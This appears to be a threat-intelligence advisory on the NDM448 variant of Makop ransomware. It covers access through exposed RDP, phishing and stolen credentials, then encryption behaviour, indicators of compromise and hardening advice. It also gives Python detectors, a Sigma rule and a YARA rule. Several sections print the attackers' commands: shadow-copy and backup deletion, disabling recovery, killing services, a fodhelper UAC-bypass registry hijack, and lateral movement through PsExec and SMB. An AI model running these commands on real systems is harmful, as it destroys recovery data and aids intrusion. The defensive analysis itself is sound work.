NDM448 Ransomware
Date Identified: 20 February 2026
Family: Makop Ransomware
Platform: Windows (primarily x64 environments)
Impact Type: Full file encryption + recovery destruction
Executive Overview
On 20 February 2026, security teams identified a new ransomware strain internally labeled NDM448, a variant of the long-running Makop ransomware family. This strain is designed to fully encrypt victim systems, destroy recovery mechanisms, and disrupt business operations rapidly.
NDM448 does not rely on sophisticated zero-day exploits. Instead, it leverages stolen or weak credentials, exposed remote access services, and administrative misuse to gain control. Once inside, it executes quickly, deletes backup mechanisms, encrypts files across local and network drives, and drops ransom instructions.
The danger of this variant lies in operational efficiency rather than novelty.
What Happened
Multiple organizations reported sudden, widespread file encryption across file servers and workstations. Systems became inaccessible within minutes to hours. Investigation showed:
- Remote login from unfamiliar IP addresses
- Execution of system utilities such as vssadmin and wmic
- Deletion of Volume Shadow Copies
- Mass file renaming with the .NDM448 extension
- Ransom notes dropped in nearly every directory
In most observed cases, attackers had administrative access before deploying the ransomware. This suggests the encryption stage was the final step of a broader compromise.
How the Breach Happened
Initial Access Vector
1. Exposed RDP (Most Common)
- Port 3389 open to the internet
- Weak or reused passwords
- No multi-factor authentication
- Brute-force attempts followed by successful login (Event ID 4624 Logon Type 10)
2. Phishing Email (Secondary Vector)
- ZIP attachment containing executable loader
- User executed attachment
- Loader fetched ransomware from remote server
3. Stolen Credentials
- Harvested from info-stealer malware
- Purchased from access brokers
- Password spraying across enterprise accounts
There is no confirmed evidence of software vulnerability exploitation or zero-day abuse. The compromise relied on valid credentials.
Attack Timeline
- Attacker scans internet for exposed RDP
- Brute-force or credential reuse login
- Establish persistence (optional)
- Disable antivirus and tamper protection
- Enumerate network shares
- Delete backups and shadow copies
- Deploy ransomware manually
- Encrypt files across environment
- Drop ransom notes
- Exit environment
Encryption typically completes in under 60 minutes in mid-sized environments.
Technical Behavior Breakdown
Execution & Drop Locations
Ransomware executable commonly copied to:
C:\ProgramData\<random>\ndm448.exe
C:\Users\Public\<random>.exe
C:\Windows\Temp\<random>.exe
File attributes set to:
- Hidden
- System
Mutex Creation
To prevent multiple instances:
Global\NDM448_MUTEX_<VictimID>
Global\Makop_<random>
Privilege Escalation
If not already elevated:
- UAC bypass using fodhelper method
- Registry hijack via:
HKCU\Software\Classes\ms-settings\Shell\Open\command
(Default) = "<malware_path>"
DelegateExecute = ""
Defense Evasion & Recovery Destruction
Before encryption, the malware executes the following:
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures
PowerShell alternative observed:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
It also attempts to stop services:
taskkill /F /IM sqlservr.exe
taskkill /F /IM veeam.exe
net stop MSSQLSERVER
Security processes targeted:
- msmpeng.exe
- avp.exe
- savservice.exe
- wrsa.exe
Lateral Movement
Attackers manually propagate using:
WMI
wmic /node:<target> process call create "<path>\ndm448.exe"
PsExec
psexec \\target -u admin -p <password> -s -d ndm448.exe
SMB Copy
net use \\target\C$ /user:admin <password>
copy ndm448.exe \\target\C$\Windows\Temp\
Encryption Process
Cryptography
- AES-256 per file
- RSA-2048 public key embedded in binary
- Unique victim ID generated
- Encrypted symmetric keys stored per file
Targeted File Types
.doc .docx .xls .xlsx .pdf .jpg .png
.zip .rar .7z
.sql .mdb .bak
.vmdk .vmx
.pst .ost
Excluded Directories
C:\Windows
C:\Program Files
C:\Program Files (x86)
C:\Boot
Excluded Extensions
.exe .dll .sys .lnk
File Renaming Pattern
filename.docx.[VictimID].NDM448
File Marker
Encrypted files often carry the following footer:
---NDM448---
ID:<VictimID>
Entropy increases significantly post-encryption.
Ransom Note Characteristics
Dropped as:
readme.txt
HOW_TO_DECRYPT_FILES.txt
RECOVERY_INFO.txt
Contains:
- Unique victim ID
- Contact email
- Bitcoin payment instructions
- 72-hour deadline warning
Network Activity
Observed Behavior
- Outbound HTTP POST to compromised sites
- TLS over port 443
- Tor gateway communication
- Random high TCP ports
Example beacon pattern:
POST /gate.php?id=<VictimID>
User-Agent examples:
Mozilla/5.0 (Windows NT 10.0; Win64; x64)
curl/7.55.1
Indicators of Compromise (IOCs)
File Indicators
Extension:
.NDM448
Ransom notes:
readme.txt
HOW_TO_DECRYPT_FILES.txt
RECOVERY_INFO.txt
Registry Indicators
HKCU\Software\Classes\ms-settings\Shell\Open\command
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Suspicious Commands
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} recoveryenabled no
Suspicious Parent-Child Process Relationships
- explorer.exe → unknown.exe
- cmd.exe → vssadmin.exe
- powershell.exe → wmic.exe
- services.exe → unknown unsigned binary
Windows Event Log Indicators
Security Log:
- 4624 (Logon Type 10)
- 4625 (Multiple failures before success)
- 4672 (Admin privileges assigned)
- 4688 (Process creation of vssadmin/wmic)
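The 4625-then-4624 sequence above is the clearest sign of the brute-force RDP entry described in the Initial Access section. The detector below is an added example, not part of the advisory; it works over constructed Security-log records (timestamp, event ID, logon type, account, source IP) rather than real telemetry, and the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Security-log records (not real telemetry):
# (timestamp, event_id, logon_type, account, source_ip).
# 4625 = failed logon; 4624 with Logon Type 10 = RemoteInteractive (RDP) success.
T0 = datetime(2026, 2, 20, 3, 0, 0)
SAMPLE_EVENTS = (
    [(T0 + timedelta(seconds=2 * i), 4625, 10, "administrator", "203.0.113.7") for i in range(25)]
    + [(T0 + timedelta(seconds=60), 4624, 10, "administrator", "203.0.113.7")]
    + [(T0 + timedelta(hours=6), 4624, 10, "jsmith", "10.0.0.5")]
)

def detect_bruteforce_then_success(events, min_failures=10, window=timedelta(minutes=10)):
    """Alert when one source IP accumulates at least `min_failures` 4625 events inside
    `window` and then produces a 4624 Logon Type 10 success. Returns a list of alert dicts.
    Thresholds are assumptions; tune them to the environment."""
    recent_failures = defaultdict(deque)  # source_ip -> 4625 timestamps still inside the window
    alerts = []
    for ts, event_id, logon_type, account, ip in sorted(events, key=lambda e: e[0]):
        q = recent_failures[ip]
        while q and ts - q[0] > window:  # expire failures older than the window
            q.popleft()
        if event_id == 4625:
            q.append(ts)
        elif event_id == 4624 and logon_type == 10 and len(q) >= min_failures:
            alerts.append({"time": ts, "source_ip": ip, "account": account, "failures": len(q)})
            q.clear()  # one alert per brute-force run
    return alerts
```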
Detection Guidance
1. Behavioral Detection
Alert when:
- Shadow copies deleted
- More than 300 files renamed in under 2 minutes
- High entropy file write spikes
- Unsigned executable launched from user-writable directory
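Two of the behavioural triggers above (the rename burst and the launch from a user-writable drop directory) can be expressed as simple logic over file and process events. The code below is an added example, not from the advisory; it uses constructed event streams, takes the drop directories from the Execution section, and does not check code signatures.

```python
from collections import deque
from datetime import datetime, timedelta

# Drop locations named in the advisory; a launch from one of these is a strong signal
# on its own (signature status is not checked here).
DROP_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")

def launched_from_drop_location(image_path):
    """True if the executable lives under one of the user-writable drop directories."""
    p = image_path.lower()
    return any(p.startswith(d) for d in DROP_DIRS)

def detect_rename_burst(events, threshold=300, window=timedelta(minutes=2), suffix=".NDM448"):
    """events: iterable of (timestamp, action, path). Returns the timestamp at which more
    than `threshold` renames to `suffix` have occurred inside `window`, or None if never."""
    recent = deque()
    for ts, action, path in sorted(events, key=lambda e: e[0]):
        if action != "rename" or not path.endswith(suffix):
            continue
        recent.append(ts)
        while ts - recent[0] > window:  # drop renames that fell out of the sliding window
            recent.popleft()
        if len(recent) > threshold:
            return ts
    return None

# Constructed file-event streams (not real telemetry): 350 renames at 5 per second
# (ransomware pace) and the same 350 spread one every 2 seconds (a normal batch job).
T0 = datetime(2026, 2, 20, 4, 0, 0)
def _renames(spacing):
    return [(T0 + i * spacing, "rename", f"\\\\fs01\\share\\doc{i}.docx.[A1B2C3D4].NDM448")
            for i in range(350)]
FAST_BURST = _renames(timedelta(milliseconds=200))
SLOW_BATCH = _renames(timedelta(seconds=2))
```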
2. Sigma Rule (Shadow Deletion)
```yaml
title: Shadow Copy Deletion Attempt
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    CommandLine|contains:
      - "vssadmin delete shadows"
      - "wmic shadowcopy delete"
      - "wbadmin delete"
  condition: selection
level: critical
```
3. YARA Rule
```yara
rule NDM448_Makop_Variant
{
  meta:
    description = "NDM448 Makop ransomware variant"
  strings:
    $a = "NDM448"
    $b = "HOW_TO_DECRYPT_FILES"
    $c = "vssadmin delete shadows"
    $d = "Global\\NDM448_MUTEX"
    $e = "---NDM448---"
  condition:
    3 of them
}
```
MITRE ATT&CK Mapping
| Tactic | Technique |
|---|---|
| Initial Access | T1078 Valid Accounts |
| Execution | T1059 Command Shell |
| Persistence | T1547 Registry Run Keys |
| Privilege Escalation | T1548 Abuse Elevation |
| Defense Evasion | T1562 Disable Security Tools |
| Lateral Movement | T1021 Remote Services |
| Impact | T1486 Data Encrypted for Impact |
Impact Assessment
Severity: Critical
Operational Disruption: High
Data Loss Risk: High
Backup Compromise: Likely if online
Recovery Without Backup: Extremely difficult
Organizations without offline backups face full operational outage.
Prevention & Hardening Recommendations
- Disable direct RDP exposure to internet
- Enforce MFA on all remote access
- Deploy EDR with behavioral monitoring
- Enable Defender tamper protection
- Maintain offline, immutable backups
- Restrict administrative privileges
- Implement network segmentation
- Monitor shadow copy deletion attempts
Final Assessment
NDM448 demonstrates that ransomware operators do not need advanced exploits to cause catastrophic damage. Valid credentials and poor remote access controls are enough.
The strain is fast, destructive, and effective. Its primary strength lies in recovery destruction and administrative misuse.
Organizations must focus on identity security and behavioral monitoring rather than relying solely on antivirus signatures.
